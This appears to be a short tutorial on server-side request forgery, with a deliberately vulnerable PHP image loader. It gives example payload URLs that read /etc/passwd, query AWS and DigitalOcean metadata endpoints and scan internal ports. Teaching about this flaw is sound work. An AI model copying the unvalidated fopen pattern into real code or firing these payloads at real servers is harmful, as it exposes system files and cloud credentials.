Share on :
commonly known as SSRF vulnerability where an attacker can launch requests from the vulnerable server (web application) to other servers which can lead for Firewall bypass to let the attacker target internal servers which are not be exposed to the attacker
It happens usually when the application sends a request and gives the user partial control on the request (eg. part of URL) , an attacker may be able to exploit this situation to control the whole request to craft malicious requests from the target server (internal and external)
High
in the following example we have a simple web-application which loads and displays images.
<?php
# Check if the 'url' GET variable is set
if (isset($_GET['image_url'])){
$url = $_GET['image_url'];
# Fetch the image from the user supplied URL
$file = fopen($url, 'rb');
# Send proper header for png images
header("Content-Type: image/png");
# Dump image file
fpassthru($file);
}
# Notify user if he didn't enter a URL
echo 'Please enter image url'
?>
http://localost/ssrf.php?image_url=https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png
http://localost/ssrf.php?image_url=file:///etc/passwd
by looking at the page source we will find the /etc/passwd file in the response body
to extract hostname AWS metadata we can use
http://localost/ssrf.php?image_url=http://169.254.169.254/latest/meta-data/hostname
for Digital ocean metadata
http://localost/ssrf.php?image_url=http://169.254.169.254/metadata/v1.json
By using SSRF you can perform port scanning for the internal network to discover services running on the network whcih may lead to further exploitations .
file://
, ftp://
, gopher://